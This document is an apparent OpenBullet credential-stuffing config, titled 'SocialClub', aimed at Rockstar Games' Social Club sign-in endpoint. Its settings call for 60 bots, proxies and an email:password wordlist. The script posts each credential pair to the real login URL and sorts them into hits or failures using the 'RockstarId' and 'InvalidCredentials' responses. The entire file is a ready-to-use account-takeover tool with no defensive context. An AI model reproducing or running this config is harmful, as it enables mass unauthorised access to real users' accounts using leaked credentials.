[SETTINGS]
{
  "Name": "SocialClub",
  "SuggestedBots": 60,
  "LastModified": "2018-05-12T01:44:26.9914523+00:00",
  "AdditionalInfo": "",
  "Author": "DADEX55",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
REQUEST POST "https://prod.ros.rockstargames.com/scui/tablet/default.aspx/SignIn" AutoRedirect=TRUE 
  CONTENT "{'title': 'mp1', 'userPassword': '<PASS>', 'gamePlatform': 'ios', 'platformName': 'ios', 'authTicket': '', 'env': 'prod', 'version': '11', 'userEmail': '<USER>'}" 
  CONTENTTYPE "application/json; charset=UTF-8" 
  HEADER "Accept: text/plain, */*; q=0.01" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://prod.ros.rockstargames.com/scui/tablet/" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Failure OR 
    KEY "InvalidCredentials" 
  KEYCHAIN Success OR 
    KEY "RockstarId" 
